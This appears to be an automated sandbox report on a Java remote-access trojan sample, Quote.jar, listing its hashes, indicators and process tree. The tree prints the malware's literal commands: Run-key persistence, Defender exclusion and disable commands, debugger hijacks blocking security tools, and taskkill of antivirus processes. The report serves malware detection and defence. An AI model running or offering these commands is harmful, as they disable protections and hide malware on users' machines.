Analysis
max time kernel: 153s
max time network: 157s
platform: windows7_x64
resource: win7v200722
submitted: 19-08-2020 14:11
Static task: static1
Behavioral task: behavioral1
Sample: Quote.jar
Resource: win7v200722 (windows7_x64)
0 signatures
0 seconds
Behavioral task: behavioral2
Sample: Quote.jar
Resource: win10 (windows10_x64)
0 signatures
0 seconds
General
Target: Quote.jar
Size: 399KB
MD5: 59444630bce44b4d60b0ff8363c5164e
SHA1: 03fa6c6f567e8a4777348d3f8a21bfc9fe2ae1f9
SHA256: 4fbba6984bfcc915b229aca31711fbbbbf17883782028b72b9a080d48cd6bb87
SHA512: 5d9abfa3a9a52dc9a68ab3e96d297389d391b4a2d30094cb4fce8cb473b52825c20c432d4e8dab91050f1dffff7630c8670337445f9b5ad6968b87c25dc5d545
Score: 10/10
Malware Config
Signatures
Qarallax RAT support DLL 1 IoCs

| resource | yara_rule |
| --- | --- |
| `behavioral1/files/0x000300000001353c-7.dat` | `qarallax_dll` |

Sets file execution options in registry 2 TTPs
Loads dropped DLL 1 IoCs

| pid | Process |
| --- | --- |
| 112 | java.exe |

Adds Run key to start application 2 TTPs 4 IoCs

| description | ioc | Process |
| --- | --- | --- |
| Key created | `\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce` | java.exe |
| Set value (str) | `\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\DsGIILk = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\FVKwo\\WbZqr.class\""` | java.exe |
| Key created | `\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run` | java.exe |
| Set value (str) | `\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run\DsGIILk = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\FVKwo\\WbZqr.class\""` | java.exe |

Drops desktop.ini file(s) 4 IoCs

| description | ioc | Process |
| --- | --- | --- |
| File created | `C:\Users\Admin\FVKwo\Desktop.ini` | java.exe |
| File opened for modification | `C:\Users\Admin\FVKwo\Desktop.ini` | attrib.exe |
| File opened for modification | `C:\Users\Admin\FVKwo\Desktop.ini` | attrib.exe |
| File opened for modification | `C:\Users\Admin\FVKwo\Desktop.ini` | java.exe |

Drops file in System32 directory 2 IoCs

| description | ioc | Process |
| --- | --- | --- |
| File created | `C:\Windows\System32\iPhDc` | java.exe |
| File opened for modification | `C:\Windows\System32\iPhDc` | java.exe |

Kills process with taskkill 16 IoCs

| pid | Process |
| --- | --- |
| 1672 | taskkill.exe |
| 1608 | taskkill.exe |
| 1600 | taskkill.exe |
| 676 | taskkill.exe |
| 1860 | taskkill.exe |
| 1880 | taskkill.exe |
| 1244 | taskkill.exe |
| 1752 | taskkill.exe |
| 1776 | taskkill.exe |
| 1488 | taskkill.exe |
| 1044 | taskkill.exe |
| 1600 | taskkill.exe |
| 684 | taskkill.exe |
| 300 | taskkill.exe |
| 828 | taskkill.exe |
| 676 | taskkill.exe |

Suspicious behavior: EnumeratesProcesses 2 IoCs

| pid | Process |
| --- | --- |
| 1072 | powershell.exe |
| 1072 | powershell.exe |

Suspicious use of AdjustPrivilegeToken 97 IoCs
Suspicious use of SetWindowsHookEx 1 IoCs

| pid | Process |
| --- | --- |
| 112 | java.exe |

Suspicious use of WriteProcessMemory 753 IoCs
1120 cmd.exe 250 PID 1120 wrote to memory of 1256 1120 cmd.exe 250 PID 1120 wrote to memory of 1256 1120 cmd.exe 250 PID 1120 wrote to memory of 1400 1120 cmd.exe 251 PID 1120 wrote to memory of 1400 1120 cmd.exe 251 PID 1120 wrote to memory of 1400 1120 cmd.exe 251 PID 112 wrote to memory of 2012 112 java.exe 252 PID 112 wrote to memory of 2012 112 java.exe 252 PID 112 wrote to memory of 2012 112 java.exe 252 PID 2012 wrote to memory of 1920 2012 cmd.exe 253 PID 2012 wrote to memory of 1920 2012 cmd.exe 253 PID 2012 wrote to memory of 1920 2012 cmd.exe 253 PID 2012 wrote to memory of 1116 2012 cmd.exe 254 PID 2012 wrote to memory of 1116 2012 cmd.exe 254 PID 2012 wrote to memory of 1116 2012 cmd.exe 254 PID 112 wrote to memory of 1508 112 java.exe 255 PID 112 wrote to memory of 1508 112 java.exe 255 PID 112 wrote to memory of 1508 112 java.exe 255 PID 1508 wrote to memory of 1488 1508 cmd.exe 256 PID 1508 wrote to memory of 1488 1508 cmd.exe 256 PID 1508 wrote to memory of 1488 1508 cmd.exe 256 PID 1508 wrote to memory of 2040 1508 cmd.exe 257 PID 1508 wrote to memory of 2040 1508 cmd.exe 257 PID 1508 wrote to memory of 2040 1508 cmd.exe 257 PID 112 wrote to memory of 1872 112 java.exe 258 PID 112 wrote to memory of 1872 112 java.exe 258 PID 112 wrote to memory of 1872 112 java.exe 258 PID 1872 wrote to memory of 1240 1872 cmd.exe 259 PID 1872 wrote to memory of 1240 1872 cmd.exe 259 PID 1872 wrote to memory of 1240 1872 cmd.exe 259 PID 1872 wrote to memory of 1772 1872 cmd.exe 260 PID 1872 wrote to memory of 1772 1872 cmd.exe 260 PID 1872 wrote to memory of 1772 1872 cmd.exe 260 PID 112 wrote to memory of 1364 112 java.exe 261 PID 112 wrote to memory of 1364 112 java.exe 261 PID 112 wrote to memory of 1364 112 java.exe 261 PID 1364 wrote to memory of 1576 1364 cmd.exe 262 PID 1364 wrote to memory of 1576 1364 cmd.exe 262 PID 1364 wrote to memory of 1576 1364 cmd.exe 262 PID 1364 wrote to memory of 1608 1364 cmd.exe 263 PID 1364 wrote to memory of 1608 1364 
cmd.exe 263 PID 1364 wrote to memory of 1608 1364 cmd.exe 263 PID 112 wrote to memory of 1876 112 java.exe 264 PID 112 wrote to memory of 1876 112 java.exe 264 PID 112 wrote to memory of 1876 112 java.exe 264 PID 1876 wrote to memory of 324 1876 cmd.exe 265 PID 1876 wrote to memory of 324 1876 cmd.exe 265 PID 1876 wrote to memory of 324 1876 cmd.exe 265 PID 1876 wrote to memory of 1476 1876 cmd.exe 266 PID 1876 wrote to memory of 1476 1876 cmd.exe 266 PID 1876 wrote to memory of 1476 1876 cmd.exe 266 PID 112 wrote to memory of 1172 112 java.exe 267 PID 112 wrote to memory of 1172 112 java.exe 267 PID 112 wrote to memory of 1172 112 java.exe 267 PID 1172 wrote to memory of 684 1172 cmd.exe 268 PID 1172 wrote to memory of 684 1172 cmd.exe 268 PID 1172 wrote to memory of 684 1172 cmd.exe 268 PID 1172 wrote to memory of 568 1172 cmd.exe 269 PID 1172 wrote to memory of 568 1172 cmd.exe 269 PID 1172 wrote to memory of 568 1172 cmd.exe 269 PID 112 wrote to memory of 1688 112 java.exe 270 PID 112 wrote to memory of 1688 112 java.exe 270 PID 112 wrote to memory of 1688 112 java.exe 270 PID 1688 wrote to memory of 1472 1688 cmd.exe 271 PID 1688 wrote to memory of 1472 1688 cmd.exe 271 PID 1688 wrote to memory of 1472 1688 cmd.exe 271 PID 1688 wrote to memory of 1392 1688 cmd.exe 272 PID 1688 wrote to memory of 1392 1688 cmd.exe 272 PID 1688 wrote to memory of 1392 1688 cmd.exe 272 PID 112 wrote to memory of 1468 112 java.exe 273 PID 112 wrote to memory of 1468 112 java.exe 273 PID 112 wrote to memory of 1468 112 java.exe 273 PID 1468 wrote to memory of 1896 1468 cmd.exe 274 PID 1468 wrote to memory of 1896 1468 cmd.exe 274 PID 1468 wrote to memory of 1896 1468 cmd.exe 274 PID 1468 wrote to memory of 832 1468 cmd.exe 275 PID 1468 wrote to memory of 832 1468 cmd.exe 275 PID 1468 wrote to memory of 832 1468 cmd.exe 275 PID 112 wrote to memory of 2008 112 java.exe 276 PID 112 wrote to memory of 2008 112 java.exe 276 PID 112 wrote to memory of 2008 112 java.exe 276 PID 2008 wrote 
to memory of 1556 2008 cmd.exe 277 PID 2008 wrote to memory of 1556 2008 cmd.exe 277 PID 2008 wrote to memory of 1556 2008 cmd.exe 277 PID 2008 wrote to memory of 1864 2008 cmd.exe 278 PID 2008 wrote to memory of 1864 2008 cmd.exe 278 PID 2008 wrote to memory of 1864 2008 cmd.exe 278 PID 112 wrote to memory of 1128 112 java.exe 279 PID 112 wrote to memory of 1128 112 java.exe 279 PID 112 wrote to memory of 1128 112 java.exe 279 PID 1128 wrote to memory of 1740 1128 cmd.exe 280 PID 1128 wrote to memory of 1740 1128 cmd.exe 280 PID 1128 wrote to memory of 1740 1128 cmd.exe 280 PID 1128 wrote to memory of 1544 1128 cmd.exe 281 PID 1128 wrote to memory of 1544 1128 cmd.exe 281 PID 1128 wrote to memory of 1544 1128 cmd.exe 281 PID 112 wrote to memory of 812 112 java.exe 282 PID 112 wrote to memory of 812 112 java.exe 282 PID 112 wrote to memory of 812 112 java.exe 282 PID 812 wrote to memory of 316 812 cmd.exe 283 PID 812 wrote to memory of 316 812 cmd.exe 283 PID 812 wrote to memory of 316 812 cmd.exe 283 PID 812 wrote to memory of 1504 812 cmd.exe 284 PID 812 wrote to memory of 1504 812 cmd.exe 284 PID 812 wrote to memory of 1504 812 cmd.exe 284 PID 112 wrote to memory of 1256 112 java.exe 285 PID 112 wrote to memory of 1256 112 java.exe 285 PID 112 wrote to memory of 1256 112 java.exe 285 PID 1256 wrote to memory of 992 1256 cmd.exe 286 PID 1256 wrote to memory of 992 1256 cmd.exe 286 PID 1256 wrote to memory of 992 1256 cmd.exe 286 PID 1256 wrote to memory of 1212 1256 cmd.exe 287 PID 1256 wrote to memory of 1212 1256 cmd.exe 287 PID 1256 wrote to memory of 1212 1256 cmd.exe 287 PID 112 wrote to memory of 1116 112 java.exe 288 PID 112 wrote to memory of 1116 112 java.exe 288 PID 112 wrote to memory of 1116 112 java.exe 288 PID 1116 wrote to memory of 1492 1116 cmd.exe 289 PID 1116 wrote to memory of 1492 1116 cmd.exe 289 PID 1116 wrote to memory of 1492 1116 cmd.exe 289 PID 1116 wrote to memory of 1956 1116 cmd.exe 290 PID 1116 wrote to memory of 1956 1116 cmd.exe 
290 PID 1116 wrote to memory of 1956 1116 cmd.exe 290 PID 112 wrote to memory of 676 112 java.exe 291 PID 112 wrote to memory of 676 112 java.exe 291 PID 112 wrote to memory of 676 112 java.exe 291 PID 112 wrote to memory of 2032 112 java.exe 293 PID 112 wrote to memory of 2032 112 java.exe 293 PID 112 wrote to memory of 2032 112 java.exe 293 PID 2032 wrote to memory of 1608 2032 cmd.exe 294 PID 2032 wrote to memory of 1608 2032 cmd.exe 294 PID 2032 wrote to memory of 1608 2032 cmd.exe 294 PID 2032 wrote to memory of 324 2032 cmd.exe 295 PID 2032 wrote to memory of 324 2032 cmd.exe 295 PID 2032 wrote to memory of 324 2032 cmd.exe 295 PID 112 wrote to memory of 1844 112 java.exe 296 PID 112 wrote to memory of 1844 112 java.exe 296 PID 112 wrote to memory of 1844 112 java.exe 296 PID 1844 wrote to memory of 684 1844 cmd.exe 297 PID 1844 wrote to memory of 684 1844 cmd.exe 297 PID 1844 wrote to memory of 684 1844 cmd.exe 297 PID 1844 wrote to memory of 1936 1844 cmd.exe 298 PID 1844 wrote to memory of 1936 1844 cmd.exe 298 PID 1844 wrote to memory of 1936 1844 cmd.exe 298 PID 112 wrote to memory of 764 112 java.exe 299 PID 112 wrote to memory of 764 112 java.exe 299 PID 112 wrote to memory of 764 112 java.exe 299 PID 764 wrote to memory of 1392 764 cmd.exe 300 PID 764 wrote to memory of 1392 764 cmd.exe 300 PID 764 wrote to memory of 1392 764 cmd.exe 300 PID 764 wrote to memory of 1600 764 cmd.exe 301 PID 764 wrote to memory of 1600 764 cmd.exe 301 PID 764 wrote to memory of 1600 764 cmd.exe 301 PID 112 wrote to memory of 1380 112 java.exe 302 PID 112 wrote to memory of 1380 112 java.exe 302 PID 112 wrote to memory of 1380 112 java.exe 302 PID 1380 wrote to memory of 1152 1380 cmd.exe 303 PID 1380 wrote to memory of 1152 1380 cmd.exe 303 PID 1380 wrote to memory of 1152 1380 cmd.exe 303 PID 1380 wrote to memory of 1556 1380 cmd.exe 304 PID 1380 wrote to memory of 1556 1380 cmd.exe 304 PID 1380 wrote to memory of 1556 1380 cmd.exe 304 PID 112 wrote to memory of 1972 
112 java.exe 305 PID 112 wrote to memory of 1972 112 java.exe 305 PID 112 wrote to memory of 1972 112 java.exe 305 PID 1972 wrote to memory of 1176 1972 cmd.exe 306 PID 1972 wrote to memory of 1176 1972 cmd.exe 306 PID 1972 wrote to memory of 1176 1972 cmd.exe 306 PID 1972 wrote to memory of 1544 1972 cmd.exe 307 PID 1972 wrote to memory of 1544 1972 cmd.exe 307 PID 1972 wrote to memory of 1544 1972 cmd.exe 307 PID 112 wrote to memory of 1672 112 java.exe 308 PID 112 wrote to memory of 1672 112 java.exe 308 PID 112 wrote to memory of 1672 112 java.exe 308 PID 112 wrote to memory of 1488 112 java.exe 310 PID 112 wrote to memory of 1488 112 java.exe 310 PID 112 wrote to memory of 1488 112 java.exe 310 PID 112 wrote to memory of 1608 112 java.exe 312 PID 112 wrote to memory of 1608 112 java.exe 312 PID 112 wrote to memory of 1608 112 java.exe 312 PID 112 wrote to memory of 1244 112 java.exe 314 PID 112 wrote to memory of 1244 112 java.exe 314 PID 112 wrote to memory of 1244 112 java.exe 314 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process
1576 attrib.exe
1608 attrib.exe
1956 attrib.exe
1152 attrib.exe
2036 attrib.exe
2040 attrib.exe
2020 attrib.exe
528 attrib.exe
Processes
-
C:\Windows\system32\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\Quote.jar1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Windows\system32\cmd.execmd.exe2⤵PID:1660
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1364
-
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:1576
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:1608
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\FVKwo\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1956
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\FVKwo\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1152
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\FVKwo2⤵
- Views/modifies file attributes
PID:2036
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\FVKwo2⤵
- Views/modifies file attributes
PID:2040
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\FVKwo2⤵
- Views/modifies file attributes
PID:2020
-
-
C:\Windows\system32\attrib.exeattrib +h +s +r C:\Users\Admin\FVKwo\WbZqr.class2⤵
- Views/modifies file attributes
PID:528
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:460
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1480
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\FVKwo','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\FVKwo\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1072
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:828
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1472
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1188
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1544
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:812
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1012
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1464
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1764
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1836
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1892
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1604
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1396
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1492
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1776
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1744
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1240
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1368
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:1752
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:992
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1864
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2044
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1408
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1372
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:1884
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:1908
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1860
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:300
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1604
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:1964
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:1608
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:676
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1688
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:1736
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:1852
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1880
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:1244
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:1872
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1120
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:1172
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:1508
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1512
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵PID:1772
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵PID:1568
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1392
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵PID:832
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵PID:1836
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:1044
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1400
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵PID:1892
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵PID:1412
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1608
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵PID:1936
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵PID:1556
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1492
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵PID:992
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵PID:1172
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2016
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵PID:1748
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵PID:1472
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:832
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵PID:1876
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵PID:1852
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:684
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1368
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵PID:1172
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵PID:1408
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1836
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵PID:1840
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵PID:1884
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:764
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:643⤵PID:1604
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:323⤵PID:1516
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1472
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵PID:300
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵PID:812
-
-
-
